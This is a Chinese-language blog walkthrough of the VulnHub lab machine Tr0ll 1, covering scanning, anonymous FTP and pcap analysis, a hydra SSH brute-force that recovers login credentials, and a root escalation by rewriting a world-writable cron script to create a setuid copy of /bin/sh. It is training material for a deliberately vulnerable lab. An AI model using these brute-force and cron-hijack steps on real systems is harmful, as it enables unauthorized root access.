首页 > 其他分享 >Walkthrough-TR0LL 1

Walkthrough-TR0LL 1

时间:2023-05-31 13:47:16浏览次数:47  
标签:60.155 192.168 TR0LL Walkthrough kali overflow txt root

0x01 环境

靶机地址:
https://www.vulnhub.com/entry/tr0ll-1,100/

该靶机偏CTF

0x02 过程

1.信息收集

┌──(root㉿kali)-[/home/kali/Desktop/oscp]
└─# netdiscover -r 192.168.60.0/24

 Currently scanning: Finished!   |   Screen View: Unique Hosts                                                             
                                                                                                                           
 9 Captured ARP Req/Rep packets, from 9 hosts.   Total size: 540                                                           
 _____________________________________________________________________________
   IP            At MAC Address     Count     Len  MAC Vendor / Hostname      
 -----------------------------------------------------------------------------
 192.168.60.155  00:0c:29:54:74:4f      1      60  VMware, Inc.                                                            

找到IP:192.168.60.155

端口开放情况

┌──(root㉿kali)-[/home/kali/Desktop/oscp]
└─# nmap --min-rate 10000 -p- 192.168.60.155 
Starting Nmap 7.93 ( https://nmap.org ) at 2023-05-30 22:16 EDT
Nmap scan report for troll (192.168.60.155)
Host is up (0.0012s latency).
Not shown: 65532 closed tcp ports (reset)
PORT   STATE SERVICE
21/tcp open  ftp
22/tcp open  ssh
80/tcp open  http
MAC Address: 00:0C:29:54:74:4F (VMware)

Nmap done: 1 IP address (1 host up) scanned in 4.05 seconds

2.思路

出现FTP,先查看FTP

┌──(kali㉿kali)-[~]
└─$ ftp 192.168.60.155
Connected to 192.168.60.155.
220 (vsFTPd 3.0.2)
Name (192.168.60.155:kali): anonymous
331 Please specify the password.
Password: 
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
229 Entering Extended Passive Mode (|||38638|).
150 Here comes the directory listing.
-rwxrwxrwx    1 1000     0            8068 Aug 10  2014 lol.pcap
226 Directory send OK.
ftp> pwd
Remote directory: /
ftp> get lol.pcap
local: lol.pcap remote: lol.pcap
229 Entering Extended Passive Mode (|||28826|).
150 Opening BINARY mode data connection for lol.pcap (8068 bytes).
100% |********************************************************************************|  8068        3.27 MiB/s    00:00 ETA
226 Transfer complete.
8068 bytes received in 00:00 (2.50 MiB/s)
ftp> exit
221 Goodbye.

发现lol.pcap文件,使用wireshark打开,发现流量中出现secret_stuff.txt,以及其内容
image
image

发现一个路径sup3rs3cr3tdirlol

打开80端口,发现很CTF
image

使用刚才的路径进入,发现文件roflmao
image

下载到本地,分析字符串

┌──(root㉿kali)-[/home/kali/Desktop/oscp]
└─# file roflmao 
roflmao: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked, interpreter /lib/ld-linux.so.2, for GNU/Linux 2.6.24, BuildID[sha1]=5e14420eaa59e599c2f508490483d959f3d2cf4f, not stripped

┌──(root㉿kali)-[/home/kali/Desktop/oscp]
└─# strings roflmao                    
/lib/ld-linux.so.2
libc.so.6
_IO_stdin_used
printf
__libc_start_main
__gmon_start__
GLIBC_2.0
PTRh
[^_]
Find address 0x0856BF to proceed

发现一句话Find address 0x0856BF to proceed
得到新路径0x0856BF
image

得到用户名文件

image

maleus
ps-aux
felux
Eagle11
genphlux
usmc8892
blawrg
wytshadow
vis1t0r
overflow

密码文件
image

密码根据提示信息,得出密码应该为:Pass.txt(吐槽一下,这就是CTF)
进行ssh爆破

┌──(root㉿kali)-[/home/kali/Desktop/oscp]
└─# hydra -L user.lst -p 'Pass.txt' 192.168.60.155 ssh
Hydra v9.4 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2023-05-30 23:01:43
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 10 tasks per 1 server, overall 10 tasks, 10 login tries (l:10/p:1), ~1 try per task
[DATA] attacking ssh://192.168.60.155:22/
[22][ssh] host: 192.168.60.155   login: overflow   password: Pass.txt
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2023-05-30 23:01:46

得到有效账户密码

overflow:Pass.txt

ssh登录

┌──(kali㉿kali)-[~]
└─$ ssh [email protected]
The authenticity of host '192.168.60.155 (192.168.60.155)' can't be established.
ED25519 key fingerprint is SHA256:jhpbgUldAKI9YAJOKhJZe9ypYt7GlEKUKU2WQ+zZBSs.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.60.155' (ED25519) to the list of known hosts.
[email protected]'s password: 
Welcome to Ubuntu 14.04.1 LTS (GNU/Linux 3.13.0-32-generic i686)

 * Documentation:  https://help.ubuntu.com/

The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.


The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.

Last login: Wed Aug 13 01:14:09 2014 from 10.0.0.12
Could not chdir to home directory /home/overflow: No such file or directory
$ id
uid=1002(overflow) gid=1002(overflow) groups=1002(overflow)
$ 

提权过程

发现可写文件

$ find / -perm -0002 -type f -print 2<dev/null | grep -v /proc/
/srv/ftp/lol.pcap
/var/tmp/cleaner.py.swp
/var/www/html/sup3rs3cr3tdirlol/roflmao
/var/log/cronlog
/sys/fs/cgroup/systemd/user/1002.user/8.session/cgroup.event_control
/sys/fs/cgroup/systemd/user/1002.user/cgroup.event_control
/sys/fs/cgroup/systemd/user/cgroup.event_control
/sys/fs/cgroup/systemd/cgroup.event_control
/sys/kernel/security/apparmor/.access
/lib/log/cleaner.py
$ cat /lib/log/cleaner.py
#!/usr/bin/env python
import os
import sys
try:
        os.system('rm -r /tmp/* ')
except:
        sys.exit()
$ cat /var/log/cronlog 
*/2 * * * * cleaner.py

发现可写文件/lib/log/cleaner.py
以及2分钟执行的任务计划/var/log/cronlog

接下来就是任务计划提权

$ vim /lib/log/cleaner.py

$ cat /lib/log/cleaner.py
#!/usr/bin/env python
import os
import sys
try:
        os.system('cp /bin/sh /tmp/sh && chmod 4777 /tmp/sh')
except:
        sys.exit()

$ /tmp/sh
# id
uid=1002(overflow) gid=1002(overflow) euid=0(root) groups=0(root),1002(overflow)
# ls /root
proof.txt
# cat /root/proof.txt
Good job, you did it! 


702a8c18d29c6f3ca0d99ef5712bfbdc

标签:60.155,192.168,TR0LL,Walkthrough,kali,overflow,txt,root
From: https://www.cnblogs.com/jarwu/p/17445077.html

相关文章

  • Walkthrough-WINTERMUTE 1
    0x01环境靶机地址:https://www.vulnhub.com/entry/wintermute-1,239/两个靶机,做网络隔离STRAYLIGHT一张网卡桥接,另一张仅主机模式,桥接网卡时,可能有点问题,重选一下网卡就好了Kali做桥接网卡NEUROMANCER仅主机kali和NEUROMANCER网络不联通0x02过程STRAYLIGHT1.信息收......
  • Vulnhub Fall Walkthrough
    Recon二层本地扫描,发现目标靶机。┌──(kali㉿kali)-[~]└─$sudonetdiscover-r192.168.80.0/24Currentlyscanning:Finished!|ScreenView:UniqueHosts4CapturedARPReq/Rep......
  • Vulnhub Joy Walkthrough
    Recon这台靶机对枚举的要求较高,如果枚举不出有用的信息可能无法进一步展开,我们首先进行普通的扫描。┌──(kali㉿kali)-[~/Labs/Joy/80]└─$sudonmap-sS-sV-p-192.168.80.136StartingNmap7.93(https://nmap.org)at2023-04-1022:42EDTNmapscanreportfor......
  • Vulnhub Development Walkthrough
    VulnhubDevelopmentWalkthroughRecon首先使用netdiscover进行二层Arp扫描。┌──(kali㉿kali)-[~]└─$sudonetdiscover-r192.168.80.0/24Currentlyscanning:Finished!|ScreenView:UniqueHosts5CapturedARPReq/Reppackets,from5hosts.Total......
  • Walkthrough-SICKOS 1.2
    0x01环境靶机地址:https://www.vulnhub.com/entry/sickos-12,144/靶机用VMware打开;virtualbox有点麻烦,参考靶机地址进行配置。0x02过程1.信息收集┌──(root㉿kali)-[/home/kali/Desktop/tmp]└─#netdiscover-r192.168.60.1/24Currentlyscanning:Finished!|......
  • Vulnhub Bravery靶机 Walkthrough
    BraveryRecon使用netdiscover对本地网络进行arp扫描。┌──(kali㉿kali)-[~]└─$sudonetdiscover-r192.168.80.0/24Currentlyscanning:Finished!|ScreenView:UniqueHosts5......
  • Walkthrough-KIOPTRIX 2014
    0x01环境靶机地址:https://www.vulnhub.com/entry/kioptrix-2014-5,62/靶机默认网卡有点问题,移除网卡再新增网卡即可环境容易崩溃,崩溃了重启就好0x02过程1.信息收集......
  • Walkthrough-KIOPTRIX LEVEL1.3
    0x01环境靶机地址:https://www.vulnhub.com/entry/kioptrix-level-13-4,25下载下来后就只有一块硬盘vmdk需要新建一个MS-DOS机器,并把硬盘指定为靶机的vmdk修改内存大......
  • Walkthrough-KIOPTRIX LEVEL1.2
    0x01环境靶机地址:https://www.vulnhub.com/entry/kioptrix-level-12-3,24/0x02过程1.信息收集netdiscover-r192.168.60.1/24Currentlyscanning:Finished!......
  • 靶机练习 - Tr0ll -2(提权)
    用overflow账号登录ssh,上传扫描文件没权限,好的,挖坑挖上瘾了是吧,换个文件夹继续传,tmp文件夹可上传成功,但是。。。没一会儿就被删了。。可能是有定时任务在执行。问了下......